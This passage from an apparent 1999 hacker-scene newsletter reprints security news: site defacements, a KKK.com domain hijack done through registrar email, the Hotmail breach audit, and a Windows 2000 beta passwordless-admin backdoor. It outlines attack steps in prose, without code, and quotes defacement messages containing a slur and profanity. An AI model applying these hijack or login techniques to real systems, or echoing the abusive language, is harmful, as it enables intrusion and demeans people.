"TechNet and its more than 140 member companies are committed to standing with the chairman as his bill goes to the full House of Representatives and to the Senate." Some Democrats, including Neal Lane, assistant to the president for science and technology, have noted with irony that Sensenbrenner has managed to earn GOP-focused praise for the party's efforts to support the high-technology community, while at the same time minimizing Democrat-based efforts in the same arena - partially by sizing down presidential technology budget requests within the appropriations bills. @HWA 39.0 SCENE RELATIONS ~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 12th September 1999 on 7:03 pm CET Today US Embassy in China (on chinese server) - www.usembassy-china.org.cn was defaced by Hi-Tech Hate. Defaced site looks like a copy of Level Seven cracks. They left some messages that talk against couple of crackers in the scene - "Vent you are a No-Skilled Fag. When will you admit it? .... aww poor v00d00, whats going to happen now that you've run out of sites to cold fusion?". Mirror here. http://www.attrition.org/mirror/attrition/1999/09/11/www.usembassy-china.org.cn @HWA 40.0 L0PHT HEAVY INDUSTRIES PROFILED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 11th September 1999 on 4:45 pm CET Heh, this is kind of awkward. Here's a Business Wire profile of the L0pht "for inclusion in your files". "L0pht Heavy Industries is a world renowned computer security think tank. Founded in 1992 as a computer research facility, the L0pht has grown into a leader in the field of computer security software." Anyways, here it is. Heh.. damn right news is slow :) Friday September 10, 10:00 am Eastern Time Company Press Release Corporate Profile for L0pht Heavy Industries, dated Sept. 10, 1999 (BUSINESS WIRE)--The following Corporate Profile is available for inclusion in your files. 
News releases for this client are distributed by Business Wire and also become part of the leading databases and online services, including all of the leading Internet-based services. Published Date: Sept. 10, 1999 Company Name: L0pht Heavy Industries Address: P.O. Box 990857 Boston MA 02199-00857 Main Telephone Number: 617-926-4889 Internet Home Page Address (URL) www.l0pht.com Chief Executive Officer: Dr. Peter Mudge Chief Financial Officer: Sandy Halflinger Investor Relations E-mail address: admin@l0pht.com Public Relations Contact: Sandy Halflinger E-mail address: press@l0pht.com Industry: Internet Security Company Description: L0pht Heavy Industries is a world renowned computer security think tank. Founded in 1992 as a computer research facility, the L0pht has grown into a leader in the field of computer security software. The L0pht's products include L0phtCrack, the industry standard NT password auditing tool. As a result of their innovative security research, the L0pht has released dozens of computer security advisories to the Internet community, warning of dangerous vulnerabilities in today's most widely used software. Many at the L0pht are considered top experts in the computer security field and have appeared on numerous network news programs and documentaries, as well as having testified about government computer security for the U.S. Senate. Visit the L0pht's web site at http://www.l0pht.com. Contact: L0pht Heavy Industries 41.0 SUMMIT TALKS FOCUS ON E-COMMERCE SAFETY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 11th September 1999 on 4:00 pm CET Two summits in Europe next week will bring together top executives and policy makers from around the world to discuss how to make e-commerce safer for consumers and merchants. Topics will be ranging from ensuring that customer data remains confidential to preventing theft of music and movies transmitted over the Net. 
So what, you may say, but this is important and could set the ground rules for dealing with (personal) information, security and privacy problems etc in the future. Read more on it here.

Summit talks focus on e-commerce safety

By Dan Goodin
Staff Writer, CNET News.com
September 10, 1999, 12:50 p.m. PT

Two summits in Europe next week will bring together top executives and policy makers from around the world to discuss how to make e-commerce safer for consumers and merchants. Commerce Secretary William Daley, Silicon Graphics chief executive Robert Bishop, and Time Warner chief executive Gerald Levin, among others, will speak at the two conferences on an array of topics--ranging from ensuring that customer data remains confidential to preventing theft of music and movies transmitted over the Net. With e-commerce generating billions of dollars in revenues--and projected to grow in the coming years--there is increasing pressure on policy makers and company executives to establish a legal framework that fits the new economy. Historically, the United States and the European Union have not seen eye to eye on issues surrounding e-commerce. Recently, the two hit a stalemate over the practice of exempting U.S. Web sites from strict new privacy laws that prevent the collection of European Internet users' personal information. That conflict, however, is not on the agenda of either conference. "There's no doubt that e-commerce is going to be the engine for economic growth in the next 10 to 20 years, and getting the rules right to ensure that governments don't create impediments is extremely important," said Neil Turkewitz, executive vice president of the Recording Industry Association of America, a trade group that represents the major U.S. record companies.

Simplifying global e-commerce

The first conference, sponsored by the Global Business Dialogue on Electronic Commerce, will take place on Monday in Paris.
Chief on the agenda is encouraging the international community to ratify treaties passed in late 1996 by the World Intellectual Property Organization (WIPO), a body affiliated with the United Nations that helps coordinate patent and copyright laws throughout the world. So far, only about ten nations, including the United States, have ratified the WIPO treaties, which essentially set up ways to enforce intellectual property rights in cyberspace. Thirty countries must ratify the measure for it to take effect. The conference also will cover ways to foster wider adoption of e-commerce among consumers, including the following: - Establishing an international forum similar to the Better Business Bureau that can mediate disputes between customers and online businesses, particularly when the parties are located in separate countries. - Extending a moratorium on tariffs placed on goods sold online when the customer is in one country and the seller is in another. - Helping to prevent security breaches. "For this market to take off, you've got to have a lot stronger feeling by consumers that this is a safe, well-lighted marketplace," said Scott Cooper, manager for technology policy at Hewlett-Packard, which will be participating in the forum. Time Warner's Levin will speak on several panels, as will Sanford Litvack, a senior executive vice president at Walt Disney. Government officials from France and Canada also plan to participate. Securing rights online The second conference, which takes place Tuesday through Thursday in Geneva, is sponsored by WIPO, and is expected to draw about 600 attendees, a WIPO official said. It is focused more closely on helping content owners police their rights online. "What people use the Internet for is to look at copyrighted materials," said Tod Cohen, vice president and counsel for new media at the Motion Picture Association of America and a participant at the WIPO conference. 
"As [the Internet] expands internationally, there's no doubt there will be international needs to meet." Since passing the copyright treaties, most of WIPO's Internet-related work has focused on eliminating "cybersquatting," the practice of registering domain names containing popular business names and then selling them at an inflated price. The Internet Corporation for Assigned Names and Numbers (ICANN), appointed by the Clinton Administration to oversee key Net policy, is now considering the proposal. For its part, the Motion Picture Association of America also is seeking a spot on the ICANN board of directors. Other speakers at the conference include Andreas Schmidt, chief executive of AOL Europe; Hilary Rosen, chief executive of the Recording Industry Association of America; Esther Dyson, interim chair of ICANN; and government officials from the United States and the European Union. @HWA 42.0 SECURITY SOLUTIONS ~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 11th September 1999 on 2:04 am CET Content Technologies (www.mimesweeper.com), creators of content-checking software called MIMESweeper and anti virus firm Command Software (www.commandcom.com) merged into alliance to offer Internet service providers complete security service. http://www.technologypost.com/enterprise/DAILY/19990910104525384.asp?Section=Main ENTERPRISE Content Technology and Command Software team up on anti-virus service NEWSBYTES Content Technologies, the firm behind the MIMESweeper content-checking software, has teamed up with Command Software, the anti-virus firm, to offer Internet service providers (ISPs) a complete information technology (IT) security service. The linkup is billed as unique in the IT security business and will, the two companies say, allows Internet service providers to offer a secure Internet environment to their users. 
Many ISPs already routinely scan inbound e-mail for their subscribers against such problems as viruses and Trojan horse programs. Almost none provide content checking services which probe "zipped" or similarly compressed attachments for similar problems. Susan Majeris, a spokesperson for Content Technologies, said that the partnership with Command Software will help ISPs differentiate themselves in what many view as a commodity market. By offering value-added services, she said, ISPs take an important step toward becoming application service providers (ASPs) - an emerging, high-growth niche for fully hosting applications. Peter Kershaw, Content Technologies' president, said that the alliance also gives ISPs the ability to process and manage higher volumes of e-mail and quarantine e-mail threats in a central location. Under the new service, these functions are pre-integrated for ISPs and can be seamlessly rolled out to customers. According to Kershaw, when the Melissa virus hit, people probably read about the e-mail downtime experienced by companies such as Boeing and Microsoft - large companies that host their own e-mail. "Imagine all of the damage done to companies that rely on ISPs for e-mail hosting. Companies shouldn't have to wait until a virus has penetrated their network to try to stop it," he said. "Our alliance with Command gives ISPs a way to protect their customers at the gateway, a powerful service that will save their customers a lot of money." Content Technologies and Command have already signed up their first customer ISP to the E-mail Command service - CyPost, an ISP serving Portland, Seattle, and Canada. Other ISPs are expected to offer the service to their customers later this year.

Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved.
@HWA

43.0 HTTP://WWW.KKK.COM HIJACKED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/

by Thejian, Friday 10th September 1999 on 11:00 pm CET
Last week, someone redirected a Ku Klux Klan Web site to that of an anti-hate group. Hacking the mailbox of one of the contacts registered with Network Solutions, the perpetrator updated the domain name server name information to a free redirection service and from there to the anti-hate Web site. The article also features some comments from Bronc Buster on how a bit of social engineering at Network Solutions gets used more and more often by people trying to get a point through.

http://www.wired.com/news/print_version/culture/story/21687.html?wnpg=all

Wired;

Ku Klux Klan Korrected
by James Glave

12:00 p.m. 10.Sep.99.PDT

To the satisfaction of many, it was a klansman's worst nightmare. K.A. Badynski woke up one day last week and found his Ku Klux Klan Web site hijacked. Visitors seeking white pride information were instead automatically sent to an organization devoted to fighting online bigotry. "The domain was stolen," said Don Black, the director of the Stormfront, a white power site. Stormfront hosts images for KKK.com. "I gather someone may have hacked an email address of one of the contacts listed in the [Network Solutions] domain name database," Black said. But the director of anti-hate group HateWatch said his organization had nothing to do with the redirect. "This type of action, hacktivism, is not only [against] the First Amendment but it also takes away one of the greatest civil rights tools we have -- using the words of bigots against them," HateWatch director David Goldman said. Goldman said that the start of the redirect coincided with comments he made against hacktivism -- politically motivated hacking and cracking -- in the Village Voice. Goldman denied responsibility, suggesting that a white-power supporter may have tried to discredit his organization.
Stormfront's Black questioned how seriously authorities would investigate the incident, and pointed the finger right back at Goldman. "One of his supporters did it," Black said. Whoever redirected the KKK.com site undertook an elaborate series of steps that began with a falsified Network Solutions domain-name change form. Network Solutions verifies changes as legitimate by sending an automated email to the registered owner of the domain. The unknown hacktivist managed to subvert that not-so-secure security measure and update the domain name server information to a company called VDirect. The perpetrator then set up an account with VDirect -- again, an automated process -- to send those looking for KKK.com to HateWatch. VDirect computers confirmed that VDirect was then registered as the owner of the KKK Web servers and dutifully completed the free transaction. VDirect co-founder Rick Harby said he tried to remove the redirect Thursday when David Goldman filed a formal complaint. By that time, however, he said the perpetrator had already repeated the stunt, redirecting the servers to the domain cmchost.com. That domain is not registered with Network Solutions, which could not be reached for comment. The KKK.com site was working as of Friday. Whatever the reason, the redirect stayed in place for almost a full week. Badynski, KKK.com's webmaster, could not be reached for comment. A member of a mailing list devoted to hacktivism said that the KKK.com site has fallen to crackers many times in the past. He said its lax security and high profile made the site an "easy target." But the source, who goes by the name Bronc Buster, said that the Internet Network Information Center, run by Network Solutions, is increasingly a target for domain bandits. "For someone like an activist, or a newbie hacktivist, with minimal high level skills, this becomes an easy way to take action," Bronc Buster wrote in an email. 
"Someone with good social engineering skills could, with some effort ... get their point across without any type of, what we think of today, as conventional hacking," Bronc Buster said. @HWA 44.0 MS ORDERS SECURITY AUDIT AFTER HOTMAIL BREACH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 10:30 pm CET Microsoft revealed today that it is turning to an outside auditor to test the security of Hotmail after the recently discovered security/privacy flaw in the free email service. "We have voluntarily invited a third-party firm to conduct its own inquiry and present us with their findings". CNet article; http://news.cnet.com/news/0-1005-200-114899.html?tag=st.ne.1002.bgif?st.ne.fd.gif.l Microsoft orders security audit after Hotmail breach By Courtney Macavinta Staff Writer, CNET News.com September 9, 1999, 4:40 p.m. PT update Microsoft revealed today that it is turning to an outside auditor to test the security of its free email service, Hotmail, after a breach was discovered last week that threatened its users' privacy. Microsoft pulled Hotmail offline for about two hours August 30 after two European Web sites alerted the company that any Net user could access any Hotmail account without a password as long as a user's name, commonly found in a Hotmail email address, was known. According to security experts, the potential damage varied from allowing unauthorized parties to see a user's list of messages to allowing them to take complete control of an account. As first reported by CNET News.com, although Microsoft said it fixed the security problem the same day, it has decided to go a step further by testing the integrity of Hotmail, which has more than 40 million active members. "We have voluntarily invited a third-party firm to conduct its own inquiry and present us with their findings," Microsoft spokesman Tom Pilla told CNET News.com. 
Microsoft, in conjunction with Truste, had planned to disclose the news on Monday. Truste is a nonprofit group that acts as a privacy watchdog. "It's an ongoing process and we're working with Truste on that," Pilla said. "We definitely take privacy very seriously here, and the incident last week was regrettable, but we moved swiftly to resolve any issues." Microsoft wouldn't provide the name of the auditing firm, which will review Hotmail security but not the security of Microsoft's other Web sites that collect personal information from users. The move by Microsoft was apparently prompted by complaints made to Truste, which is expected to publish the so-called watchdog reports publicly. Microsoft is a premier sponsor of Truste and carries the program's licensed seal, which informs Web users about precautions a site is taking to protect their privacy. Late this afternoon Truste went ahead and posted an advisory on its Web site stating that Microsoft had agreed to its recommendation to hire a third-party firm to investigate and confirm that the Hotmail security hole had been fixed. "We are pleased with what Microsoft is doing, but we needed to assure those who had concerns that the process was underway to address this," David Steer, communications manager for Truste, said today. With issues like the Hotmail hole popping up more and more, Truste will start focusing on security issues, Bob Lewin, the organization's executive director, added in a statement. "The bottom line is that there is no trust without privacy and, likewise, there is no privacy without reasonable security of the data being collected," Lewin stated. Privacy seal programs have been touted by the online industry and the Clinton administration as one way to safeguard Net users' anonymity without government regulation. 
But consumer advocates want stricter laws put in place for the digital age, as Net users are constantly forfeiting valuable personal information in exchange for goods and customized Web content. The Truste seal usually applies to the use of personal information collected from surfers, but licensees also have to ensure that they will "help protect the security" of the information they store. Although free Web-based email services are one of the Web's most popular tools, they have suffered from service problems in the past. This is not Truste's first investigation into Microsoft privacy practices. In March, Truste looked into a feature in Microsoft's Windows 98 operating system that could be exploited to collect information about authors of electronic documents without their knowledge through a unique identification number. But Truste concluded that Microsoft.com, which carries the seal, was in compliance with all Truste principles. The program did state, however, that "while the complaint itself does not pertain to the Web site, Truste believes that is important to note that the transfer of hardware IDs to the Microsoft secure server without customer consent did, in Truste's opinion, compromise consumer trust and privacy." @HWA 45.0 EMBASSY CRACKER MAY BE PLAYING GOVERNMENTS' GAME ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 10:00 pm CET Top British computer security experts have warned that LevelSeven may be playing into the hands of the US government with their hack of the US embassy in China earlier this week. "Governmental organisations will have a really strong barrier somewhere and then a number of much less strong barriers in front of that. They will do this for two reasons. One is to see if people are targeting them and the other is to see exactly how they are doing it. Effectively they work as a trip wire." 
http://www.zdnet.co.uk/news/1999/36/ns-9880.html Embassy cracker may be playing government's game Fri, 10 Sep 1999 16:41:00 GMT Will Knight The response to crackers invading a US embassy site: It's just what the US wants. Top British computer security experts have warned that those responsible for cracking and defacing the US embassy Web site in China on Wednesday may be playing into the hands of the US government. The crackers have identified themselves as "The Level Seven Crew". The group claims not to have damaged the site's servers during the crack and says also that it repaired the security hole after posting details of the crack on the front page. Chad Davis, a founder member of cracking group Global Hell, which has been linked with The Level Seven Crew, was arrested in August by US authorities for breaking into the US army Web page. He has been accused of "maliciously" interfering with the army's communications system. British government security expert Ian Johnston-Bryden, of Oceanus Security in Suffolk, believes the crackers could be doing exactly what the US government wants. "Governmental organisations will have a really strong barrier somewhere and then a number of much less strong barriers in front of that," he says. "They will do this for two reasons. One is to see if people are targeting them and the other is to see exactly how they are doing it. Effectively they work as a trip wire." Johnston-Bryden also believes that cracking a government agency is no stepping stone to more sensitive information. "Usually the really sensitive government stuff won't get anywhere near a public network. Also the encryption used to send information is not only very strong but is completely different from public encryption." Robert Schifreen, another security consultant and self-confessed ex-hacker, agrees that getting into a governmental Web site says little about real computer security. 
"It is tempting to advertise these sorts of things as major security breaches, but they are probably just the sort of standard cracks that could happen to anyone." "I would be inclined to think that normal hackers would not be able to break into something like the US embassy. The security measures they use are very, very different to those protecting a commercial Web server." @HWA 46.0 CYBER-CORPS TO PROTECT FEDERAL COMPUTERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 3:00 pm CET The Clinton administration is planning a "cybercorps" to protect federal information systems. The Federal Cyber Service Initiative includes a special cadre of university students called the Cyber Corps, who would serve as federal computer warriors in exchange for computer-science scholarships. The initiative further calls for creating a Center for Information Technology excellence to train current federal workers to meet the new security challenges. And, the official said, "We're also looking at recruiting systems administrators right out of high school." http://web.lexis-nexis.com/more/cahners-chicago/11407/4981818/2 September 9, 1999, Thursday KR-ACC-NO: DA-CYBER-CORPS LENGTH: 1008 words HEADLINE: Clinton Administration Plans Cyber Corps to Protect Federal Computers BYLINE: By Jim Landers BODY: WASHINGTON--Uncle Sam wants computer-savvy college and high school students to fight the nation's information wars against hackers, terrorists and foreign agents. Daily cyber attacks on federal computers and a shortage of technology talent have led the Clinton administration to push recruitment as part of a broad computer defense plan to be released this month. The Federal Cyber Service Initiative includes a special cadre of university students called the Cyber Corps, who would serve as federal computer warriors in exchange for computer-science scholarships. 
The effort spotlights what experts say is a new and serious threat: a computer-wielding terrorist or foreign power bringing down the nation's electric power grid, air-traffic control network or other crucial systems. "The whole IT security threat has been a revolution. It has put a whole lot of pressure on federal agencies," said a White House national security official. The first class of 300 juniors, seniors and graduate students would be chosen next year, with another 600 in 2001, according to the official, who spoke on condition of anonymity. The initiative calls for creating a Center for Information Technology excellence to train current federal workers to meet the new security challenges. And, the official said, "We're also looking at recruiting systems administrators right out of high school." All of the military service branches are looking for information technology specialists, and are having trouble retaining those already in on the federal payroll. Private-sector employers are offering well-paid positions for computer security experts. Assistant Secretary of Defense Arthur Money told the Senate Armed Services Committee this summer the Pentagon needs to offer incentives "such as proficiency pay, retention bonuses, and education and training opportunities to maintain a pool of highly skilled workers." Administration officials say cyber attacks happen every day, and that exercises have shown widespread weaknesses in government systems. "Forget the individual hacker, the disgruntled insider. There are hostile nations developing, or who have developed, offensive cyber-attack capability aimed at the United States," said Jeffrey Hunker, the National Security Council's director of information protection. "We believe there may be some well-funded terrorist organizations that either have offensive cyber-attack capability or may easily develop it. The same is true of organized-crime elements," he said. 
Even before its formal unveiling, the computer defense plan is drawing criticism from some members of Congress and privacy advocates. Critics see the plan's Federal Intrusion Detection Network as an FBI license to snoop on Internet traffic and e-mail. White House and FBI officials insist the criticism is misplaced, describing the Fidnet merely as a way to alert officials about computer intrusions. It would cover only "a small number of very critical systems within the federal government," said another White House official who also spoke on the condition of anonymity. Federal officials are still in the dark about how many employees they need to mount an adequate cyber defense. The dearth of information kept the administration from asking Congress for funds to launch the program this year. The Office of Personnel Management is about halfway through a study of how many information technology specialists now work on computer security and how many the government needs to protect itself. The study is expected to be finished by the spring. The cyber defense plan itself is months behind schedule. For several weeks, it has been under review at the Justice Department. "We're trying ... to make the federal government's computer security a model for the rest of the nation," one White House official said. "Right now the federal government is a model of what you don't want to be doing." Mr. Clinton first referred to the Cyber Corps in a January speech at the National Science Foundation about new types of national security threats. The president said he was asking Congress for $1.46 billion to protect critical infrastructure systems from computer and other types of attacks. Part of the money, he said, would go to "bolster the government's ranks of highly skilled computer experts." But since then, the planning has unfolded well out of the public eye. 
The Cyber Corps concept evolved into a scholarship program patterned after the Reserve Officer Training Corps, or ROTC, where the government provides scholarships to college students in exchange for military service after graduation. Cyber Corps students would work summer internships in high-security sites such as the Energy Department's nuclear weapons labs. The program is designed as a two-year scholarship, but could later be expanded to four years if it succeeds, one White House official said. Initial costs would be $50,000 to $60,000 per student. The government now relies on several different security agencies for protection from cyber attacks. After a virus crippled much of the operating networks of the fledgling Internet in 1988, the Defense Advanced Research Projects Agency created a cyber "SWAT team" at Carnegie-Mellon University in Pittsburgh. The Computer Emergency Response Team, or CERT, and includes about 20 computer security experts. It responded to fewer than 100 attacks in 1989, but faced nearly 2,500 attacks in 1998. About 80 other CERT teams have been created across the country. Each branch of the military also has its own team of specialists. One difficulty facing the federal cyber-training initiative is a dearth of strong computer security programs at U.S. universities, the second White House official said. "Right now there are only about 20 strong programs out there, or that will be in place within 12 months," the official said. "There are not a lot of IT security majors or minors out there." ----- Visit The Dallas Morning News on the World Wide Web at http://www.dallasnews.com/ JOURNAL-CODE: DA @HWA 47.0 WINDOWS2000 BETA 3 BACKDOOR ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 2:30 pm CET David Litchfield of Arca Systems Inc. has discovered a serious flaw in the Win2k "autologin" feature which was incorporated in this release. 
On machines not connected to a domain affected versions of the Win2k installer automatically create an "autologin" account with administrative privileges and no password. If the Windows2000 Telnet server is active an attacker could find out the autologin account user name and log in with complete control over the computer. ZDNet. http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- A real Windows back door By David Raikow, Sm@rt Reseller September 9, 1999 12:58 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html Amid all the spurious hype about the supposed "NSA Back Door" in Windows NT, a real and very dangerous security breach in some builds of Windows 2000 Beta 3 has gone almost unnoticed. In an e-mail circulated Monday, David Litchfield of security consultancy Arca Systems Inc. described a simple technique that would give an attacker full access to a susceptible machine. Microsoft (Nasdaq:MSFT) acknowledges it was aware of the breach within days of shipping Windows 2000 Beta 3 in April. The breach will be disabled in its Release Candidate 2 build, which Microsoft could release next week. While not the final release of Windows 2000, Beta 3 is the most widely circulated build, and one which Microsoft sold to interested testers and got certain OEMs to agree to preload on new systems. Microsoft claims that more than 650,000 testers are working with the build and the subsequent release candidates which Beta 3 testers receive. Autologin the culprit The Windows 2000 security problem stems from an "autologin" feature that Microsoft incorporated into the initial Beta 3 release. 
On machines not connected to a domain -- including the vast majority of home users -- affected versions of the Windows 2000 installer automatically create an "autologin" account based on the user's software registration information. This account has administrative privileges on the system and has no password. By itself, this feature presents little problem unless an attacker can get physical access to the machine in question. If the Telnet server built into Windows 2000 is active, however, an attacker could use a nbtstat command to find the autologin account user name, and log in with complete control over the computer. Even worse, the Telnet server can be covertly activated by a simple Visual Basic script hidden in any HTML document. Scott Culp, Microsoft security manager for NT, acknowledged that the autologin feature had presented a threat, but said that it had been removed in recent builds. He was unable to provide the precise build number in which autologin was removed. "This was an option intended to allow users with good physical access to their hardware a simplified login process, but our security team quickly recognized the problems involved and insisted on its removal," said Culp. '... Not ready to ship' "It's important to remember that this is a beta product, and not ready to ship. Finding these kinds of problems is what the beta process is all about." Culp also acknowledged that a remote user could start the Windows 2000 Telnet server. While this bug in itself has serious security implications, he insisted that the removal of the autologin feature had rendered it useless to an attacker. "The attack requires an account with a known name and password, but ... we've already implemented changes that prevent that," he said. The "autologin" feature was implemented in Microsoft Windows Beta 3, and will not exist in the forthcoming Release Candidate 2. 
According to Microsoft, the feature was altered to prompt users for a password in Release Candidate 1, which they released to testers in July. Additional reporting by Will Knight, ZDNet UK, and Mary Jo Foley, Sm@rt Reseller. @HWA 48.0 AMERICAN EXPRESS AND E-COMMERCE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Friday 10th September 1999 on 3:43 am CET American Express works on secure transactions in e-commerce. New credit card with added security features for e-commerce will offer several levels of protection. American Express Online Wallet will help people to feel secure and be secured. "Digital wallets are definitely a good move, both for the consumer and the retailer" said Nick Jones, analyst for Jupiter Communications. http://www.zdnet.co.uk/news/1999/35/ns-9838.html Amex card targets online security fears Thu, 09 Sep 1999 15:49:04 GMT Justin Pearse American Express has launched a credit card with added security features for e-commerce. The first feature aimed at allaying the fears of shoppers entering into online transactions is the American Express Online Wallet. Members enter purchase information, such as card details and home address. When making an online purchase the user opens the wallet, clicks on a "complete purchase" button and the vendor's form is automatically filled in. For the really paranoid American Express is also offering a second level of protection, in the form of a smart card reader. Built into the Blue card is a chip that can be read by a smart card reader, provided free, attached to the user's PC. The embedded chip holds a unique digital certificate that acts to unlock the Online Wallet once the user has swiped his card through the reader and entered their PIN number. The card has been launched in the US only at present. 
A spokesperson for American Express said, "In the US we kept hearing that one of the main barriers to taking up online shopping for those new to the Internet was security worries, and so this seemed like the perfect time to introduce a product to try and reassure our customers." She could not confirm plans for a UK launch, saying, "We'll have to see how it does here first." Nick Jones, analyst for Jupiter Communications, is impressed by the security measures offered by the card. "Digital wallets are definitely a good move, both for the consumer and the retailer," he said. "Offering the card reader is smart, it gives consumers an extra hand to hold onto. Although the process of having to attach an extra device to your PC may give them another thing to be worried about." @HWA 49.0 BUSINESS TOO TRUSTING OF E-MAIL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 9th September 1999 on 1:30 pm CET According to Neil Barrett, technical director for information security consultancy IRM, poor e-mail security is leaving around two thirds of companies vulnerable. Citing independent research from the Cyberliability Group, he says businesses are far too trusting with e-mail. "This trust makes it an extremely soft target for hackers and a major security weakness," according to Barrett. http://www.32bitsonline.com/news.php3?news=news/199909/nb199909089&page=1 Business Too Trusting Of E-mail, Warns Security Consultancy By: Sylvia Dennis Date: 09/08/99 Location: LONDON, ENGLAND Poor e-mail security is putting computer networks at risk, according to Dr. Neil Barrett, technical director for Information Risk Management (IRM), the independent information security consultancy. Barrett cites independent research from the Cyberliability Group as suggesting that around two thirds of large UK companies are vulnerable. "Although the recent Microsoft Hotmail incident has generated a lot of publicity, it's only one small incident. 
The big problem is that business is far too trusting of e-mail," he said. "This trust makes it an extremely soft target for hackers and a major security weakness," he told Newsbytes. "In system tests, IRM has used falsified e-mails to trick firms into installing Trojan programs such as Back Orifice, providing open access to their computer systems," he added. According to Barrett, recent research from the Cyberliability Group has revealed that 54 percent of large UK firms have no formal policy for controlling the use of external e-mail, while 19 percent of firms with a policy do not check for compliance. Sir Simon Hornby, IRM's chairman, meanwhile, said that the management of risk is key to all future developments in the transfer of information, e-commerce, and on-line services. Hornby said that IRM was set up because, in today's interconnected business environment, security has become the dominant factor not only in the development of business and the growth of e-commerce, but also in the exercise of due diligence. @HWA 50.0 SCOTTISH HACKERS DECLARE WAR ON WALES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 9th September 1999 on 2:50 am CET A group calling itself the Hardcore Highland Haxxors (HHH) has defaced the Scottish Executive Web site and renamed it the Scottish H4xecutive. The new "civil servants" charged with advising Scottish politicians and enforcing their policy have also accused the "Whelsh" Office (sic) of rustling sheep. In retaliation, the HHH has declared that Scotland is now at war with Wales. This happened after an initial warning by DNScon that the site was vulnerable as we reported last week. 
http://www.theregister.co.uk/990908-000005.html Posted 08/09/99 3:33pm by Tim Richardson Scottish Crackers declare war on Wales It appears Braveheart hackers have carried out their threat to trash a Scottish government Web site after warning First Minister Donald Dewar that it was vulnerable to attack from cyber terrorists. A group calling itself the Hardcore Highland Haxxors (HHH) has defecated all over the Scottish Executive Web site and renamed it the Scottish H4xecutive. The new "civil servants" charged with advising Scottish politicians and enforcing their policy have also accused the "Whelsh" Office (sic) of rustling sheep. In retaliation, the HHH has declared that Scotland is now at war with Wales. "The Scottish H4xecutive has estimated that over 5000 sheep have been russled by agents of the Whelsh office in the last six months. It is of our opinion that these sheep that were destined for the butchers of Carslile will soon end up on the streets of Cardiff. "In force IMMEDIATELY is a state of WAR between us to put right the theft of our oh-so precious sheep." It's just a pity they aren't as concerned about their ability to spell as they are about their sheep, but there you go. A spokesman for the Scottish Executive said that although the incident was embarrassing there was "no threat to internal security". "Our internal system is quite separate from the information on our Web site," he said adding that all was being done to resolve the problem. The Scottish Executive Web site is hosted by Scotland Online, a subsidiary of Scottish Telecom. No one from the Web company or telco was available for comment at press time. 
® @HWA 51.0 V-ONE AND RED HAT IN SECURITY PACT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 8th September 1999 on 6:30 pm CET The NY Times has a story on a "security pact" between V-One Corp and Red Hat Inc in the form of V-One's Linux-based Instant Extranet Server, which allows companies to use the Internet securely to share information with suppliers and customers using private networks running Internet-based software. "IXS combines V-One's network security software with Linux software from market leader Red Hat." http://www.nytimes.com/library/tech/99/09/biztech/articles/08red-hat.html V-One and Red Hat in Security Pact By REUTERS NEW YORK -- Shares of Internet security software maker V-One Corp. and Red Hat Inc. surged Tuesday after V-One unveiled Linux-based software that allows companies to form secure links with their trading partners. Shares of Germantown, Md.-based V-One soared 104 percent, or $2-3/8, to $4-5/8 a share, after reaching a 52-week high earlier in the day of $5-1/4. Red Hat shares rose $8-7/8 to $93-9/16. Both trade on the Nasdaq stock market. The software, called Instant Extranet Server (IXS), allows companies to use the Internet securely to share information with suppliers and customers using private networks running Internet-based software. IXS combines V-One's network security software with Linux software from market leader Red Hat. Linux is a low cost alternative operating system to Microsoft Corp.'s Windows that is developed by an open community of software programmers. V-One said the IXS system, which can be installed in under 30 minutes, would sell for $995, giving small businesses access to Internet security that has previously been available only to larger organizations paying far higher prices. 
@HWA 52.0 HACKERS DEFACE HACKER'S SITE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Wednesday 8th September 1999 on 5:12 pm CET www.redattack.dyns.cx, web site of hacker called RedAttack (that Belgian hacker who liked the media). "You just created hoaxes and the belgian hackers community didn't like that - where is your credibility now? The media will be notified". BTW in Default #4 you could read an interview with Belgian hacking group CUM, which also talks about RedAttack. -=- REDATTACK HAS BEEN ATTACKED BY THE REDATTACK ATTACK SQUAD Fuck off you stupid RedAttack - you have been hacked by RAAS You just created hoaxes and the belgian hackers community didn't like that - where is your credibility now? The media will be notified Don't you feel BLUE now? This was the page of an MS-certified hacker. BTW: did you discover USENET yet ? -=- The Interview from Default #4; Special about Belgian Hacker Szene / Bust of RedAttack. Interviewed CUM ( Crew Madness Underground ) I had a little interview with toxic from CUM, Belgiums best h/p/v/c/a group. Check his statements about The RedAttack bust and about the Belgian hacker scene. <--begin interview-- deepcase: ok, tell something about the belgium scene ! toxic : There isn't much to tell about that.. we used to have a quite "close" scene in the BBS era.. but that's now gone with the Internet... You don't have much belgian groups anymore... with the internet it's like more the individual that counts i guess..., still there are some 